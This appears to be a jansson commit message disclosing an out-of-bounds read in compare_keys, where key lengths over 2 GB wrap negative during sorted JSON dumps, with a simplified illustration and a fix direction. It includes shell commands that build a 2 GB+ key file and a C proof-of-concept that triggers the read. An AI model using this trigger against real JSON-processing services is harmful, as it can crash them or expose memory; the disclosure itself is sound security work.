jansson
Handle keys longer than 2 GB
It is possible to trigger an out-of-bounds read in compare_keys while dumping JSON with JSON_SORT_KEYS, due to signed integer usage.
If a key is longer than 2 GB, the len field of key_len turns negative. The comparison code passes the smaller of the two lengths to memcmp; since a negative int converted to size_t becomes a huge value, the memcmp call eventually reads out of bounds.
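The effect can be illustrated with a minimal, hypothetical sketch (names are simplified; the actual struct and comparator live in src/dump.c and may differ in detail):

#include <stdio.h>
#include <string.h>

/* Hypothetical, simplified model of the pre-fix comparator:
 * the key length is kept in a signed int and wraps negative
 * for keys longer than INT_MAX bytes. */
struct key_len {
    const char *key;
    int len;                      /* signed: goes negative past 2 GB */
};

static int compare_keys(const struct key_len *a, const struct key_len *b) {
    int min = a->len < b->len ? a->len : b->len;
    /* memcmp takes a size_t: a negative min converts to a value near
     * SIZE_MAX, so memcmp walks far beyond the end of both keys. */
    return memcmp(a->key, b->key, (size_t)min);
}

int main(void) {
    int wrapped = -2;             /* stands in for a wrapped > 2 GB length */
    printf("a negative int passed as size_t becomes %zu\n", (size_t)wrapped);
    (void)compare_keys;
    return 0;
}

The fix direction implied by the description is to carry the key length as an unsigned size_t so it can never go negative.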
Proof of Concept:
- Create a JSON file with two keys, one of which is longer than 2 GB:
echo -n '{"' > header.json dd if=/dev/zero bs=1024 count=2097153 | tr '\0' 'a' > poc.json dd if=header.json of=poc.json conv=notrunc echo -n '":"a","a":""}' >> poc.json
- Compile and run this proof-of-concept code (a possible build command follows the listing):
#include <jansson.h>
#include <unistd.h>

int main(void) {
    json_error_t error;
    json_t *json;

    if ((json = json_load_file("poc.json", 0, &error)) == NULL)
        return 1;
    if (json_dump_file(json, "/dev/null", JSON_SORT_KEYS))
        return 1;
    return 0;
}
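Assuming jansson is installed where pkg-config can find it (jansson ships a jansson.pc file), the proof of concept can be built and run with something like the commands below; compiling with AddressSanitizer makes the out-of-bounds read easy to observe:

cc -g -fsanitize=address -o poc poc.c $(pkg-config --cflags --libs jansson)
./poc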
Without this patch, an out-of-bounds read occurs.
Signed-off-by: Tobias Stoeckmann [email protected]